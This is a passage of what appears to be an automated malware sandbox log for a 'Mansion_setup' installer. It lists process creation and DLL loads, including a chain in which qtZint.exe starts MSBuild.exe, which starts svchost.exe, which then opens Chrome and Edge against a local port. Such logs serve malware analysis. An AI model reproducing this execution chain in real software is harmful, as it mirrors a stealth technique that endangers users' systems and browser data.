Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exeJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: msspellcheckingfacility.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uiautomationcore.dllJump to behavior
